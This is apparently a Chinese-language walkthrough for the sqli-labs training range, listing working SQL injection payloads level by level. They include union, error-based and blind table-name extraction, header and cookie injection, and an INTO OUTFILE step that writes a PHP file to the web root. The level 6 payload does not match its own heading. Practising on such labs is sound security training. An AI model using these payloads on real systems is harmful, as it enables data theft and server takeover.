sql-labs靶场
第一关(get传参,单引号闭合,有回显,无过滤)
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+
第二关(get传参,无闭合,有回显,无过滤)
?id=-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')
第三关(get传参,括号加单引号闭合,有回显,无过滤)
?id=-1') union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+
第四关(get传参,括号加双引号闭合,有回显,无过滤)
?id=-1") union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+
第五关(get传参,单引号闭合,无回显有报错,无过滤)
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+
第六关(get传参,双引号闭合,无回显有报错,无过滤)
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+
第七关(get传参,单引号加两个括号闭合,无回显有报错,无过滤)写webshell
?id=-1')) union select 1,2,'<?php phpinfo();' into outfile "D:\\phpstudy\\phpstudy_pro\\WWW\\sqli\\Less-7\\a.php" --+
第八关(get传参,单引号闭合,无回显无报错,无过滤)
?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>50--+
第九关(get传参,单引号闭合,页面无变化,无过滤)
?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>50,sleep(3),0)--+
第十关(get传参,双引号闭合,页面无变化,无过滤)
?id=1" and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>50,sleep(3),0)--+
第十一关(post传参,单引号闭合,有回显,无过滤)
a' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#
第十二关(post传参,双引号加括号闭合,有回显,无过滤)
a") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#
第十三关(post传参,单引号加括号闭合,无回显有报错,无过滤)
a') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
第十四关(post传参,双引号闭合,无回显有报错,无过滤)
a" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
第十五关(post传参,单引号闭合,页面无变化,无过滤)
admin' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>50#
第十六关(post传参,双引号加括号闭合,页面无变化,无过滤)
admin") and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>50#
第十七关(post传参,单引号闭合,无回显有报错)uname被过滤,通过password注入
aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1
第十八关(post传参,单引号闭合,无回显有报错)uname和password被过滤,通过uagen注入
aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1
第十九关(post传参,单引号闭合,无回显有报错)uname和password被过滤,通过referer注入
第二十关(post传参,单引号闭合,无回显有报错)uname和password被过滤,通过cookie注入
第二十一关(post传参,单引号闭合,无回显有报错)uname和password被过滤,通过cookie(base64)编码注入
第二十二关(post传参,双引号闭合,无回显有报错)uname和password被过滤,通过cookie(base64)编码注入
第二十三关(get传参,单引号闭合,有回显,有过滤)#,--被过滤了
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),1 and '1'='1
